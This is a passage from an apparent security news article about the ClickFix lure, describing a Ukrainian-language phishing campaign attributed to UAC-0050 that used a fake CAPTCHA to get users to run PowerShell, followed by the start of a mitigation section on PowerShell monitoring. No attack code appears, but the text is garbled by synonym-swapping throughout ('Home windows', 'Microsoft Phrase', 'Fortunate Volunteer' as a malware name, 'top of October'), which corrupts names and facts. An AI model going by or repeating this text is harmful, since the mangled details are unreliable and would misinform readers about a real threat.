Even cyber-espionage teams appear to have adopted the ClickFix approach. Towards the top of October, an APT group tracked as UAC-0050 that has a historical past of focusing on organizations from Ukraine launched a phishing marketing campaign in Ukrainian that used faux notifications about shared paperwork to direct customers to an attacker-controlled web site. The web site used the mixture of reCAPTCHA Phish and ClickFix to trick customers into operating PowerShell as a part of a CAPTCHA problem. The code deployed a hardly ever used data stealer dubbed Fortunate Volunteer.
Mitigation
Put in on Home windows by default, PowerShell is a really highly effective scripting language and setting designed to simplify and automate system administration duties. Due to its large adoption in malware assaults over the previous 10 years, security merchandise monitor for doubtlessly malicious PowerShell invocations.
Nevertheless, they usually search for situations the place PowerShell scripts are being executed by different processes, as a result of that’s how PowerShell is often abused — as half of a bigger assault chain, resembling being launched by malicious Microsoft Phrase macros, or a malware dropper downloading and executing a malicious PowerShell script to deploy further payloads.
